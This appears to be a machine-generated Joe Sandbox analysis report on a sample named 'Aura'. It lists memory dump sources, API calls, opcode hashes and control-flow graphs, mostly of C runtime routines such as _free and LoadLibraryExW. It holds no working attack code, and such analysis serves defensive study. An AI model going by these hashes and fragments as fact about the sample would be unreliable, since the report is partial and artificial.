                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ?I*
                                                • API String ID: 0-3687047043
                                                • Opcode ID: f8c778611659a4c1cb541bdf4504de0f33de42f4081a59d239ae82058cd3b50e
                                                • Instruction ID: e10c43c3606f0915e581169e73aa2632680056ecb25ae1f73c5f70697df5ab59
                                                • Opcode Fuzzy Hash: f8c778611659a4c1cb541bdf4504de0f33de42f4081a59d239ae82058cd3b50e
                                                • Instruction Fuzzy Hash: F7622176F44115CFDB088FBCC9903CD77FAAB4A394F20C115D465EBBA4C62AD90A8B16
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6CDCAF9C,?,?,00000008,?,?,6CDCAC34,00000000), ref: 6CDCB1CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 9ebcbec38f98ca2eb63abedd4e9492547d0c97677b2ea2fb23a28f88df3e608b
                                                • Instruction ID: 31db7366818156e93e4f2086f29af67d4f595bfc415a00b4a2d4a0a08e671a4c
                                                • Opcode Fuzzy Hash: 9ebcbec38f98ca2eb63abedd4e9492547d0c97677b2ea2fb23a28f88df3e608b
                                                • Instruction Fuzzy Hash: 11B13731610608EFD705CF28C486B59BBA4FF45368F258659E8E9CF6E1C336E982CB41
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CDC216E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                • Opcode ID: 6776c8a47e1d446a95eb302f2a97eea4833a73cdd59ef09ebe028061bced1c8d
                                                • Instruction ID: b0dae6004e9c68ed3cb5a1b7813f9a4e17e85c0984941d8f7ae89db935290de6
                                                • Opcode Fuzzy Hash: 6776c8a47e1d446a95eb302f2a97eea4833a73cdd59ef09ebe028061bced1c8d
                                                • Instruction Fuzzy Hash: 9C519EB1B01309CBDB0ACF95C8867AAB7F4FB49318F24956AC421EB691D379DA40CF51
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1409462bba5bfc86acf3aabce6ee59a6857a3876c72ba0bd6c64f859addd2976
                                                • Instruction ID: 86afa5ae031ace51760ca2bf89e2a2bd4f3e33ef277270ab070c6c209b7ad3ce
                                                • Opcode Fuzzy Hash: 1409462bba5bfc86acf3aabce6ee59a6857a3876c72ba0bd6c64f859addd2976
                                                • Instruction Fuzzy Hash: 7041B1B190421DAFDB10DF69CC88AEABBBDEF45304F1442D9E41DD3620EA349E849F60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5|iL
                                                • API String ID: 0-1880071150
                                                • Opcode ID: 78104efe85f71e5ab9e754fa74a91a6a26cf829f5b4af90054ccae7e1ccce6c7
                                                • Instruction ID: 82c694bdcaffc689c97fa5212da04a015ef831cacda66d7ac434cd3281531a94
                                                • Opcode Fuzzy Hash: 78104efe85f71e5ab9e754fa74a91a6a26cf829f5b4af90054ccae7e1ccce6c7
                                                • Instruction Fuzzy Hash: 84710333A053104FC722AE28DD8136BFB92ABD5724F2EC57DDD989B36AD6309C058781
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @
                                                • API String ID: 0-2766056989
                                                • Opcode ID: 950723044ea2bda713fb4aaf0c1f039c9d703b2cd28a1cce98fd1289990eb26a
                                                • Instruction ID: 1b6b05860988c7e09e48a60abf60387293317b78607c2c827c7aff1f6f0c9eef
                                                • Opcode Fuzzy Hash: 950723044ea2bda713fb4aaf0c1f039c9d703b2cd28a1cce98fd1289990eb26a
                                                • Instruction Fuzzy Hash: 79415871A183008BDB15CF28D891B7B77E0FF95328F05862CE8998B3A1E7359909C786
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: 487762ef7be7cdeea8f8efbac3b0ab244b4cd3cd659ffaf804a689f0052892d6
                                                • Instruction ID: 7c6866225cf29533b89afc3c82612d8e913dfba3f3f4022e65cf1c1e62684bab
                                                • Opcode Fuzzy Hash: 487762ef7be7cdeea8f8efbac3b0ab244b4cd3cd659ffaf804a689f0052892d6
                                                • Instruction Fuzzy Hash: 0DA011303082028BAB008E3A828A3083ABCAA82280308002AA200C0000EE288AC0AA80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2fdd73de9dd52209bfcb22ad514a4a287a63731393cb18d2d1a5e46c36d234d1
                                                • Instruction ID: 9a63177993ebf2270ad9026826d4b9f28f8033bf9896bc02944e70620f2aecec
                                                • Opcode Fuzzy Hash: 2fdd73de9dd52209bfcb22ad514a4a287a63731393cb18d2d1a5e46c36d234d1
                                                • Instruction Fuzzy Hash: C8526AB0209B818ED32A8F3C8855797BFE5AB5A314F148A6DE0FE873D2C7752105CB56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1064450f975059acd76055d11bc1ed5ec2ea0db93e6fba30adbd93a239cc9f8
                                                • Instruction ID: 998e93256e4100608486daecbb7838eb4997c949e5a61064c872434c58716f42
                                                • Opcode Fuzzy Hash: f1064450f975059acd76055d11bc1ed5ec2ea0db93e6fba30adbd93a239cc9f8
                                                • Instruction Fuzzy Hash: 76D1F7B6A552068FCB04CFBCCD913DD7BF2AB4A365F245216D413E77A4D63A8909CB10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86fd705ecd07a1c599bba6556a7fe84512ce46315195af01b1dac019c3a406fe
                                                • Instruction ID: 5cf2dd706fb0ccb8f9303aec586316e845730841800e987332b571576361f681
                                                • Opcode Fuzzy Hash: 86fd705ecd07a1c599bba6556a7fe84512ce46315195af01b1dac019c3a406fe
                                                • Instruction Fuzzy Hash: B89125769042614BCB26CE28885066BBB91AB86324F19C63DECBD9B3D2D638CC45D7C1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7ab2f0d74e72c96b1893432cd7a93efc23dd64297d52696129e2fd14b240f9e
                                                • Instruction ID: 380fb9578eafcfb12fdc8b70a0319fbc5f41598934ae0ad317d327d5cbe08078
                                                • Opcode Fuzzy Hash: f7ab2f0d74e72c96b1893432cd7a93efc23dd64297d52696129e2fd14b240f9e
                                                • Instruction Fuzzy Hash: E2613B37A0AD814BD73A893C5C113AB6A875BE3330F3EC76AD5B98B7E1D56988024341
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 88c2f9913ebd50c4577d94cb52bf2d7d260aa51900c8900def48f7f0b227e4a6
                                                • Instruction ID: b5525ef0f968b9dd199bad4893bc41e78e2bbd18f89fb1915e8c220447480bac
                                                • Opcode Fuzzy Hash: 88c2f9913ebd50c4577d94cb52bf2d7d260aa51900c8900def48f7f0b227e4a6
                                                • Instruction Fuzzy Hash: 04515B37A1DA904BCB166E7C4C412A8AA575BD7230B3E83F6ECB19B3D1C179CC0653A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bd9cbd2b60e59ff4c269f4705751a508f30efbf92afe7f5677a6b131bbec1e8a
                                                • Instruction ID: 267f4db2d9799b60dbb1f010b9733ede6d39a628852236918ab3281715b3eb27
                                                • Opcode Fuzzy Hash: bd9cbd2b60e59ff4c269f4705751a508f30efbf92afe7f5677a6b131bbec1e8a
                                                • Instruction Fuzzy Hash: D1517DB16083448FE314EF69D89435BBBE1BBC4318F154E2DE4E987351E379D6088B92
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2367271941.0000000000332000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                • Associated: 00000000.00000002.2367256128.0000000000330000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_330000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3951450a173172011dce93d68a2115a0220b0307c540af054cccfc0a9d38e956
                                                • Instruction ID: c1183db8c6b062d39272e509649bfdaf323da7cef15606c7d580d4d8be7e36c3
                                                • Opcode Fuzzy Hash: 3951450a173172011dce93d68a2115a0220b0307c540af054cccfc0a9d38e956
                                                • Instruction Fuzzy Hash: 45512B36A0EBA147CB2A9E3C1C111B96E574B9733073E83AAEDB6977E1C215CC119391
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                • Instruction ID: 9ced9752cae842806e1a1bb41da75f51b644d8d0d4bb480997570a36ed3ec215
                                                • Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
                                                • Instruction Fuzzy Hash: 13E08C32A16238EBCB11DBC8C90099AF3FCEB49A14B1144AAB601E3620C770DF01C7D1

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2033 6cdc72d8-6cdc72ec 2034 6cdc72ee-6cdc72f3 2033->2034 2035 6cdc735a-6cdc7362 2033->2035 2034->2035 2036 6cdc72f5-6cdc72fa 2034->2036 2037 6cdc73a9-6cdc73c1 call 6cdc7449 2035->2037 2038 6cdc7364-6cdc7367 2035->2038 2036->2035 2039 6cdc72fc-6cdc72ff 2036->2039 2047 6cdc73c4-6cdc73cb 2037->2047 2038->2037 2041 6cdc7369-6cdc73a6 call 6cdc4bf3 * 4 2038->2041 2039->2035 2042 6cdc7301-6cdc7309 2039->2042 2041->2037 2045 6cdc730b-6cdc730e 2042->2045 2046 6cdc7323-6cdc732b 2042->2046 2045->2046 2052 6cdc7310-6cdc7322 call 6cdc4bf3 call 6cdc9207 2045->2052 2049 6cdc732d-6cdc7330 2046->2049 2050 6cdc7345-6cdc7359 call 6cdc4bf3 * 2 2046->2050 2053 6cdc73cd-6cdc73d1 2047->2053 2054 6cdc73ea-6cdc73ee 2047->2054 2049->2050 2055 6cdc7332-6cdc7344 call 6cdc4bf3 call 6cdc9305 2049->2055 2050->2035 2052->2046 2061 6cdc73e7 2053->2061 2062 6cdc73d3-6cdc73d6 2053->2062 2057 6cdc7406-6cdc7412 2054->2057 2058 6cdc73f0-6cdc73f5 2054->2058 2055->2050 2057->2047 2068 6cdc7414-6cdc741f call 6cdc4bf3 2057->2068 2065 6cdc73f7-6cdc73fa 2058->2065 2066 6cdc7403 2058->2066 2061->2054 2062->2061 2070 6cdc73d8-6cdc73e6 call 6cdc4bf3 * 2 2062->2070 2065->2066 2073 6cdc73fc-6cdc7402 call 6cdc4bf3 2065->2073 2066->2057 2070->2061 2073->2066
                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 6CDC731C
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC9224
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC9236
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC9248
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC925A
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC926C
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC927E
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC9290
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92A2
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92B4
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92C6
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92D8
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92EA
                                                  • Part of subcall function 6CDC9207: _free.LIBCMT ref: 6CDC92FC
                                                • _free.LIBCMT ref: 6CDC7311
                                                  • Part of subcall function 6CDC4BF3: HeapFree.KERNEL32(00000000,00000000,?,6CDC3E2C), ref: 6CDC4C09
                                                  • Part of subcall function 6CDC4BF3: GetLastError.KERNEL32(?,?,6CDC3E2C), ref: 6CDC4C1B
                                                • _free.LIBCMT ref: 6CDC7333
                                                • _free.LIBCMT ref: 6CDC7348
                                                • _free.LIBCMT ref: 6CDC7353
                                                • _free.LIBCMT ref: 6CDC7375
                                                • _free.LIBCMT ref: 6CDC7388
                                                • _free.LIBCMT ref: 6CDC7396
                                                • _free.LIBCMT ref: 6CDC73A1
                                                • _free.LIBCMT ref: 6CDC73D9
                                                • _free.LIBCMT ref: 6CDC73E0
                                                • _free.LIBCMT ref: 6CDC73FD
                                                • _free.LIBCMT ref: 6CDC7415
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: fbd03e3bf56942a720374103682cbc65e57f9ad3c156b353acecbbb7c932e432
                                                • Instruction ID: f121ce60485a7c5836d5e69f3cab04e124f9a0af62f41be9acac97a0abe23219
                                                • Opcode Fuzzy Hash: fbd03e3bf56942a720374103682cbc65e57f9ad3c156b353acecbbb7c932e432
                                                • Instruction Fuzzy Hash: AF314A31704601EEEB119B79D840BAA7BEEBF00318F215419F479D7A70DF34E9848722

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2090 6cdc44b3-6cdc44c6 2091 6cdc44c8-6cdc44d1 call 6cdc4bf3 2090->2091 2092 6cdc44d2-6cdc457f call 6cdc4bf3 * 9 call 6cdc42df call 6cdc434a 2090->2092 2091->2092
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 57cd1513d436409648109f5a3f31de7460673fb1ed46f3b7b06ac34bd9896b1d
                                                • Instruction ID: e856f43d955f5f2c5676c112e940e7603430b6aec939c41d9b6f15d89ba27ce4
                                                • Opcode Fuzzy Hash: 57cd1513d436409648109f5a3f31de7460673fb1ed46f3b7b06ac34bd9896b1d
                                                • Instruction Fuzzy Hash: 0A21B87AA0410CEFDB01DF98C880EEE7BB9BF18244F009166F5199B630DB71DA58CB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2216 6cdc2a90-6cdc2ae1 call 6cdcb720 call 6cdc2a50 call 6cdc2ed7 2223 6cdc2b3d-6cdc2b40 2216->2223 2224 6cdc2ae3-6cdc2af5 2216->2224 2225 6cdc2b60-6cdc2b69 2223->2225 2226 6cdc2b42-6cdc2b4f call 6cdc2ec0 2223->2226 2224->2225 2227 6cdc2af7-6cdc2b0e 2224->2227 2231 6cdc2b54-6cdc2b5d call 6cdc2a50 2226->2231 2229 6cdc2b24 2227->2229 2230 6cdc2b10-6cdc2b1e call 6cdc2e60 2227->2230 2233 6cdc2b27-6cdc2b2c 2229->2233 2239 6cdc2b34-6cdc2b3b 2230->2239 2240 6cdc2b20 2230->2240 2231->2225 2233->2227 2234 6cdc2b2e-6cdc2b30 2233->2234 2234->2225 2237 6cdc2b32 2234->2237 2237->2231 2239->2231 2241 6cdc2b6a-6cdc2b73 2240->2241 2242 6cdc2b22 2240->2242 2243 6cdc2bad-6cdc2bbd call 6cdc2ea0 2241->2243 2244 6cdc2b75-6cdc2b7c 2241->2244 2242->2233 2249 6cdc2bbf-6cdc2bce call 6cdc2ec0 2243->2249 2250 6cdc2bd1-6cdc2bed call 6cdc2a50 call 6cdc2e80 2243->2250 2244->2243 2246 6cdc2b7e-6cdc2b8d call 6cdcb5c0 2244->2246 2254 6cdc2b8f-6cdc2ba7 2246->2254 2255 6cdc2baa 2246->2255 2249->2250 2254->2255 2255->2243
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 6CDC2AC7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6CDC2ACF
                                                • _ValidateLocalCookies.LIBCMT ref: 6CDC2B58
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6CDC2B83
                                                • _ValidateLocalCookies.LIBCMT ref: 6CDC2BD8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: 4f812dd15b2c899f7cbcbc1989ff53c11ed370803b79519794b88d2c02924ad3
                                                • Instruction ID: 97a1c5ee93928732c872c1ce21769015d64362f1264b8a98e04e0bb6552a6ad8
                                                • Opcode Fuzzy Hash: 4f812dd15b2c899f7cbcbc1989ff53c11ed370803b79519794b88d2c02924ad3
                                                • Instruction Fuzzy Hash: 4B41B774B01209DBCF00CF69C888AAEBBBEAF4531CF109155D914AB765DB31DA05CBA2

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2262 6cdc611a-6cdc6126 2263 6cdc61cd-6cdc61d0 2262->2263 2264 6cdc612b-6cdc613c 2263->2264 2265 6cdc61d6 2263->2265 2266 6cdc613e-6cdc6141 2264->2266 2267 6cdc6149-6cdc6162 LoadLibraryExW 2264->2267 2268 6cdc61d8-6cdc61dc 2265->2268 2269 6cdc61ca 2266->2269 2270 6cdc6147 2266->2270 2271 6cdc61b4-6cdc61bd 2267->2271 2272 6cdc6164-6cdc616d GetLastError 2267->2272 2269->2263 2274 6cdc61c6-6cdc61c8 2270->2274 2273 6cdc61bf-6cdc61c0 FreeLibrary 2271->2273 2271->2274 2275 6cdc616f-6cdc6181 call 6cdc4253 2272->2275 2276 6cdc61a4 2272->2276 2273->2274 2274->2269 2277 6cdc61dd-6cdc61df 2274->2277 2275->2276 2282 6cdc6183-6cdc6195 call 6cdc4253 2275->2282 2279 6cdc61a6-6cdc61a8 2276->2279 2277->2268 2279->2271 2281 6cdc61aa-6cdc61b2 2279->2281 2281->2269 2282->2276 2285 6cdc6197-6cdc61a2 LoadLibraryExW 2282->2285 2285->2279
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6cdb0000_Aura.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: 0e4fd3773503f08f859a1afa8f792f077fed021cacf80117dc71c6c22b26ec50
                                                • Instruction ID: 9988822bc7645385f87b11af3efd1eb349768df1d861d41f00f5a39b65621b0b
                                                • Opcode Fuzzy Hash: 0e4fd3773503f08f859a1afa8f792f077fed021cacf80117dc71c6c22b26ec50
                                                • Instruction Fuzzy Hash: 89212B31F45A21EBEF114B258C40B6E377C9F827A9F210612EE11E76A2D630ED02C5E2
                                                APIs
                                                  • Part of subcall function 6CDC936E: _free.LIBCMT ref: 6CDC9393
                                                • _free.LIBCMT ref: 6CDC93F4
                                                  • Part of subcall function 6CDC4BF3: HeapFree.KERNEL32(00000000,00000000,?,6CDC3E2C), ref: 6CDC4C09
                                                  • Part of subcall function 6CDC4BF3: GetLastError.KERNEL32(?,?,6CDC3E2C), ref: 6CDC4C1B
                                                • _free.LIBCMT ref: 6CDC93FF
                                                • _free.LIBCMT ref: 6CDC940A
                                                • _free.LIBCMT ref: 6CDC945E
                                                • _free.LIBCMT ref: 6CDC9469
                                                • _free.LIBCMT ref: 6CDC9474
                                                • _free.LIBCMT ref: 6CDC947F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2368787578.000000006CDB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDB0000, based on PE: true
                                                • Associated: 00000000.00000002.2368768767.000000006CDB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368823957.000000006CDCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368847110.000000006CDD2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2368912218.000000006CE22000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
